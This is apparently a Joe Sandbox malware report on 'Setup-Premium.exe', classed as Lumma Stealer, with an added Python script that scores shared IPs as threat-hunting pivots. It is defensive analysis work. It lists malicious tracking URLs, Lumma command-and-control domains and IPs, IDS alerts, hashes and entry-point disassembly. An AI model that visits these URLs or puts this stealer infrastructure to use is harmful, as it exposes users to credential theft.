https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AADy6+7GSFDtie9t8Cg/YUEnWHeQNpQUM5LtDe7UJMsLOceAyoyG1gPOseIEt6wEQOIS0cQG9+43HQOpwin+IcDGpXOmivIAoIj+kjiIGL1D2+8BvnDBEaMAH0f591eHch8eVhYXQMKLzHwgDODg3wt5JqhlbP9RQzflWbxkgz8rcLW9fZi6fO8I2q/H/mufxAmprX0pckYJIlZDOjEWtANKm9qQyuOPBTmTxFfQ7lSnZTWTopfzM4iUzlHH6YHH2Gwf9rOJKxuawJshVk1D6tC4SPWT4Qn+EH36v6noVRG1OVZuyh8POMokxISZrUYw04m/WI9EIj5YnXnJ0pu3aN84TxZoMpQWLf/bmERiIc3Nyv1tTCdvcY5yUV048SjizDEvcSo7xAYIkZcbJD4FxApNB4P7tHx7BM4Ye85I4pWktamhPb27vCl/+uYQPRubCgSnJCgEpm957xU4Pe9/Mw441Bx0a9Cw1g==&c=AAAMLqZiPcHPCafs0rFGm1fIkoNaTXck7ODBjyaeBBJn4WJkh+1bSUuW3EZ3mxfwfU+bqGXZerIBh+MSgUxyjr2dBgbCYcsfxsvjUb8rm3+6Y+MBXQzywIZk3yyBwMGrGcyqAW4sC8CEsQLo0qa26hZf6P5Mds0gAcBhLOQHNHGs04Bz8kP6rN3oyHvKAVKj6q6jh+o5tCfFCSfoFphn1jIlhz58l/iThGupLjhturtvKm1NOX3hQvVyGuodJdqpVFaaDIitHXcYMqB9UmB9x5Je567LlrJzANu3yeDnFlF+FPlEJBxfqHj5MAKq9a5hjcUMFWRj2C1f6q3FTviqfxGBcXqL6mjrfRn2e6SZ3cLMdbrvJF8+K9bEjK0z+DPrn/wowMPNg/sWBhdBb591VOmiiOgz82MQYX1oZvuxWVx8Ss8Y39FUpF/cGTcZLojkZK6/ZSGPHVUwgwezuarqDmRh2tnVahKh1zxiH7oFrg0dqApoWgloHFVuYES+Zx6Fwu8ffg2y+FHXsyJlLjARsT0dR3inuufunKnxFU0f0p8osK+QnybUWCcqfkqTetWNzB5Z8asqQvYhVbUlxqje0VAbhML1S+q4B7u3yifa6/t82x0LbRE1kHeNSO2USFPZmw2CUqF5 | malicious | Unknown
• 23.227.38.65
https://confortdelaine.net/_t/c/A1020005-17FC1B6DB5BD9241-7C90090F?l=AACK/veH9NDjNFiJHV0SalQi1vBoTxR3+CaR+Tf08xqCc5VCUGXc4X3qdIj9jWGkdCLuES/KY7ELen4EAn/FdnHqCQjbGr4W7dR4kVnBVs6emUveso+FtMlz8WLaK/uswzzWIgI+d66EsmSIAjCn6klItun/LyfhMBm/RvF8+GmEHKuHrtJ8flo99oIsJ0uYTUcGFmrLFZUm12SmxPleHrWwUcLBo1d4hUAo1H1WkirRXbLvtA5AFdQBsGObYvK4Jtgjqj5gw5MW75B9OQ54AcZkBQKcIkmFcg1YL0qDKrf81oJq2UUhMNPl/V/7Lmh2Iy3+rO2Qx71WjGONpPizWLvD7lune8iRYENSNu1xGJst2AqunbtEprrHIRzSb0HY+HbbjV8np3yVIxGt0yN7Vmb5AARDME7dIwHUrmOBP8igeJjkCyNogIrPeE8U4hVHOONDQ0fRseICVU1/ok2ExphS1u92stTGUjMCSci5vEz5fgxKUh8PMHHlxtZQmBjhUQ==&c=AABwK74RGNbpZkLbXDMgwGkEPcjIolhPI3ARymI3akMXqIIsvKkft1xo30+FsOmyglvzbe8Yz6H3Z4LxZ/0aTZFTqxR6u54legvtFlkuV/Y5fZXwm/YmPanR9jUnqtc4hPznzAuUrT6U7sovDeUggzqrrdSH45Gj/uRY+/LazDIdhTbOxXQwN2GEeE643R7hV3n9WYZrcN1rJdKE4J3VridUK5YywIX20BWPmYGQ+iqSfiaJQlNujGzur2PRjzxDNGxHixYHr88wjhccRzzqt63TgH68hxiQWBS2WMJ8V78YgSedyDzugz0SWoHXC4lIoIg/mD4/gfyj8ItwLNrpe3LWbVMyaC3Ad4pEpAUwx2rMNAE2ZRJGw2pFtc10IGwr77FIEYyERoM+q4jxSJoFtK3knGK9ms7DQJFt8w0eTeON/BC9KGyQaC64dCNz+N4+Xs4aPX/XWl9TCa+jzc65pmbZE5Fi0IpF2S9gBcOFdJjQtmI1vA8o1jxGHT+6uixJoZsPaoFWVJAAyljwh/1U0kE7VmRRTmULBXD/WiUTWrHi0xFoOw6OPuSKQtWkN98CCafLvNNkYgEzgEh7ZP0U7YG2Ui/9zjmE3N9hxjTOSgO7rba70M6HBYbc4mR2U37DUGxUEU5C | malicious | Unknown
• 23.227.38.65
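The rows above are the evidence behind the report's "IP address seen in connection with other malware" and "Internet Provider seen in connection with other malware" signatures: each row is another sample, its verdict, the family Joe Sandbox assigned to it, and the IP it shared with this one. Read as hunting material, the rows are not equal. A Cloudflare-fronted address such as 104.21.77.78 or 172.67.221.87 is shared reverse-proxy infrastructure that LegionLoader, Meduza Stealer and LummaC operators all sit behind, so it is a poor block-list entry, whereas an address outside such ranges that only ever co-occurs with one family is a usable pivot. The Python below is an added example, not part of the Joe Sandbox report: it parses rows in the flattened form shown here and scores each context IP. The input blocks are constructed to mirror rows on this page (the URL row is shortened), the CDN prefix list is a hardcoded subset of Cloudflare's published IPv4 ranges, and the strong/weak thresholds are my own assumptions rather than anything the report defines.

```python
"""Score the context IPs in Joe Sandbox 'associated sample' rows.

Added example, not part of the Joe Sandbox report. The input format is the
flattened report text: one row per associated sample
    <sample name or URL>Get hash<verdict><threat, threat, ...>Browse
followed by one '• <ip>' context line per IP the sample shared with ours.
The Match-column value (an IP, domain, ASN or JA3 hash) is fused onto the
first sample name by the flattening, so parse_block() takes it as a key.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Hardcoded subset of Cloudflare's published IPv4 ranges (assumption: a hit
# here is shared CDN/reverse-proxy infrastructure, not attacker-owned).
SHARED_CDN = [ip_network(n) for n in (
    "104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13",
    "188.114.96.0/20", "162.158.0.0/15", "141.101.64.0/18",
)]

ROW_RE = re.compile(
    r"^(?P<sample>.+?)\s*(?:Get )?hash"           # name/URL, then the 'Get hash' widget
    r"(?P<verdict>malicious|suspicious|clean|unknown)"
    r"(?P<threats>.*?)Browse$"                     # threat list, then the 'Browse' widget
)
CTX_RE = re.compile(r"^•\s*(\d{1,3}(?:\.\d{1,3}){3})$")


def parse_block(text, match_key=""):
    """Parse one Match block into [{sample, verdict, threats, ips}, ...]."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        ctx = CTX_RE.match(line)
        if ctx:
            if not rows:
                raise ValueError("context IP before any sample row: " + line)
            rows[-1]["ips"].append(ctx.group(1))
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unrecognised row: " + line)
        sample = m.group("sample")
        if not rows and match_key and sample.startswith(match_key):
            sample = sample[len(match_key):]        # strip the fused Match value
        threats = [t.strip() for t in m.group("threats").split(",") if t.strip()]
        rows.append({"sample": sample, "verdict": m.group("verdict"),
                     "threats": threats, "ips": []})
    return rows


def score_pivots(rows, min_samples=2):
    """Aggregate per context IP and rate it as a hunting pivot.

    'strong': outside the shared CDN ranges, seen with >= min_samples samples,
    all of them carrying the same single named family. Anything else is
    'weak': shared infrastructure, a single sighting, or mixed families.
    These thresholds are an assumption for this example, not Joe Sandbox logic.
    """
    agg = defaultdict(lambda: {"samples": 0, "families": set()})
    for row in rows:
        for ip in row["ips"]:
            agg[ip]["samples"] += 1
            agg[ip]["families"].update(row["threats"])
    scored = {}
    for ip, a in agg.items():
        addr = ip_address(ip)
        shared = any(addr in net for net in SHARED_CDN)
        fams = sorted(a["families"])
        strong = (not shared and a["samples"] >= min_samples
                  and len(fams) == 1 and fams != ["Unknown"])
        scored[ip] = {"samples": a["samples"], "families": fams,
                      "shared_infra": shared,
                      "pivot": "strong" if strong else "weak"}
    return scored


def summarize(blocks):
    """blocks: iterable of (match_key, flattened_text); returns score_pivots()."""
    rows = []
    for key, text in blocks:
        rows.extend(parse_block(text, key))
    return score_pivots(rows)


# Constructed input mirroring rows on this page (URL row shortened).
IP_BLOCK = """\
104.102.49.254file.exeGet hashmaliciousLummaCBrowse
• 104.102.49.254
file.exeGet hashmaliciousLummaCBrowse
• 104.102.49.254
Solara.exeGet hashmaliciousLummaCBrowse
• 104.102.49.254
"""
ASN_BLOCK = """\
CLOUDFLARENETUSv.1.6.3__x64__.msiGet hashmaliciousLegionLoaderBrowse
• 172.67.221.87
phantomtoolsv2.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
• 104.26.13.205
Solara.exeGet hashmaliciousLummaCBrowse
• 104.21.77.78
vsYkceYJOX.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RedLine, Stealc, VidarBrowse
• 172.67.141.136
https://confortdelaine.net/_t/c/A1020005-17FCBF5826D778A0-C9FF7535?l=...&c=... hashmaliciousUnknownBrowse
• 23.227.38.65
"""

if __name__ == "__main__":
    blocks = [("104.102.49.254", IP_BLOCK), ("CLOUDFLARENETUS", ASN_BLOCK)]
    for ip, info in sorted(summarize(blocks).items()):
        print(f"{ip:16} {info['pivot']:6} cdn={info['shared_infra']!s:5} "
              f"n={info['samples']} families={', '.join(info['families'])}")
```

The same scoring applies unchanged to a JA3 group: a JA3 match groups samples by TLS client implementation rather than by operator, so its context IPs should be rated on their own co-occurrence history and never blocked on the fingerprint value alone.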
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | Solara.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8, 172.67.173.224, 188.114.96.3, 172.67.152.13, 104.102.49.254, 172.67.205.156, 172.67.140.193, 104.21.79.35
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.420307068406414
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Setup-Premium.exe
File size: 22'590'464 bytes
MD5: 65ab8081d6a7f813a39bd06052fa5887
SHA1: 3a2724a4b2e33d1aeb93eadf4e0e2916b5c0450d
SHA256: 3dd3a9ee5cbe4e846be6f6921e8b1fe56317e5a292768625e8710061581d90ec
SHA512: 9706ce98126ea72c9d1d64f35f49d3abdabd5b598ceb1543b6755b0f9455363ecc6d4d61efcccfb72f2a0f352a38df3457521e4a9ebb2059f2c0c075c11fcd93
SSDEEP: 98304:70LRtlZ0qtmb1ZQnH1rYL1WzbYoawZOa2rqXFKngtg0tNO59cTLKnkhiIzII4pr4:KtzX61OtKEawZOaQg1tNOhnagprqjR7
TLSH: 2B372842F9CB92F5DA476830449BA22F27345D019B28CBDBE745BA6EE8772D20D37305
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........X..................D......p........0E...@...........................\.......Y...@................................
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x47dd70
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: c1a56dd2884ebae2645c18b421ad3aee
Instruction
jmp 00007EFD8CF2A150h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007EFD8CF02F36h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
                                                                                                                                                                                      add eax, 00000BA0h
                                                                                                                                                                                      mov dword ptr [edx+08h], eax
                                                                                                                                                                                      mov dword ptr [edx+0Ch], eax
                                                                                                                                                                                      lea edi, dword ptr [ecx+34h]
                                                                                                                                                                                      mov dword ptr [edx+18h], ecx
                                                                                                                                                                                      mov dword ptr [edi], edx
                                                                                                                                                                                      mov dword ptr [esp+04h], edi
                                                                                                                                                                                      call 00007EFD8CF2C5B4h
                                                                                                                                                                                      cld
                                                                                                                                                                                      call 00007EFD8CF2B63Eh
                                                                                                                                                                                      call 00007EFD8CF2A279h
                                                                                                                                                                                      add esp, 08h
                                                                                                                                                                                      ret
                                                                                                                                                                                      jmp 00007EFD8CF2C460h
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      int3
                                                                                                                                                                                      mov ebx, dword ptr [esp+04h]
                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                      mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                                                      mov ecx, dword ptr [ebx+04h]
                                                                                                                                                                                      cmp ecx, 00000000h
                                                                                                                                                                                      je 00007EFD8CF2C461h
                                                                                                                                                                                      mov eax, ecx
                                                                                                                                                                                      shl eax, 02h
                                                                                                                                                                                      sub esp, eax
                                                                                                                                                                                      mov edi, esp
                                                                                                                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                                                                                                                      cld
                                                                                                                                                                                      rep movsd
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x153f000 | 0x480 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x15c6000 | 0x1f54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1540000 | 0x84f24 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1455ac0 | 0xbc | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa0cab8 | 0xa0cc00 | 4bbcf131ed89128de29b28f1b2e76a9c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa0e000 | 0xa44654 | 0xa44800 | 3399e65d1839104121309f842fb99c21 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1453000 | 0xebbec | 0xb2400 | f02a4e3ba890dd9b9b59be799b0909b1 | False | 0.40694852296633943 | data | 6.223021719147453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x153f000 | 0x480 | 0x600 | 1a73e78e7c3dd8e12dd66d806f5f0dbc | False | 0.365234375 | data | 4.119800823396545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1540000 | 0x84f24 | 0x85000 | ddf0fc1540d1ef9d5f47fa0a39f99867 | False | 0.5463206355733082 | data | 6.637522283069667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x15c5000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x15c6000 | 0x1f54 | 0x2000 | 448aa04f986ae889e5596b4b279afa5d | False | 0.3302001953125 | data | 4.666338698942476 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x15c61d4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x15c62fc | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x15c6864 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x15c6b4c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_GROUP_ICON | 0x15c73f4 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x15c7434 | 0x4f4 | data | English | United States | 0.2657728706624606
RT_MANIFEST | 0x15c7928 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T01:44:13.809431+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:13.809431+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:13.830191+0200 | 2056570 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) | 1 | 192.168.2.5 | 52356 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:14.362224+0200 | 2056571 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:14.796868+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:14.796868+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:14.803554+0200 | 2056568 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) | 1 | 192.168.2.5 | 54113 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:14.812869+0200 | 2056566 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) | 1 | 192.168.2.5 | 63561 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:15.332555+0200 | 2056567 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) | 1 | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:15.767746+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:15.767746+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | TCP
2024-10-13T01:44:15.770723+0200 | 2056564 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) | 1 | 192.168.2.5 | 57119 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:17.105383+0200 | 2056565 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) | 1 | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:17.530500+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:17.530500+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | TCP
2024-10-13T01:44:17.533350+0200 | 2056562 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) | 1 | 192.168.2.5 | 63184 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:18.054859+0200 | 2056563 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) | 1 | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:19.560631+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:19.560631+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | TCP
2024-10-13T01:44:19.562795+0200 | 2056560 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) | 1 | 192.168.2.5 | 59139 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:20.054032+0200 | 2056561 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) | 1 | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:20.503224+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:20.503224+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | TCP
2024-10-13T01:44:20.524057+0200 | 2056558 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) | 1 | 192.168.2.5 | 50968 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:21.017673+0200 | 2056559 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) | 1 | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:21.464056+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:21.464056+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | TCP
2024-10-13T01:44:21.465912+0200 | 2056556 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) | 1 | 192.168.2.5 | 60232 | 1.1.1.1 | 53 | UDP
2024-10-13T01:44:21.974390+0200 | 2056557 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) | 1 | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:22.318748+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:22.318748+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | TCP
2024-10-13T01:44:23.583545+0200 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49744 | 104.102.49.254 | 443 | TCP
2024-10-13T01:44:24.377334+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49751 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:24.377334+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49751 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:25.412146+0200 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49757 | 104.21.53.8 | 443 | TCP
2024-10-13T01:44:25.412146+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49757 | 104.21.53.8 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 01:44:12.481951952 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:12.481978893 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:12.482048035 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:12.483488083 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:12.483504057 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:12.974108934 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Oct 13, 2024 01:44:12.974183083 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:12.977952957 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Oct 13, 2024 01:44:12.977962017 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:12.978260994 CEST44349704188.114.96.3192.168.2.5
                                                                                                                                                                                      Oct 13, 2024 01:44:13.032001019 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.363359928 CEST49704443192.168.2.5188.114.96.3
                                                                                                                                                                                      Oct 13, 2024 01:44:13.363359928 CEST49704443192.168.2.5188.114.96.3
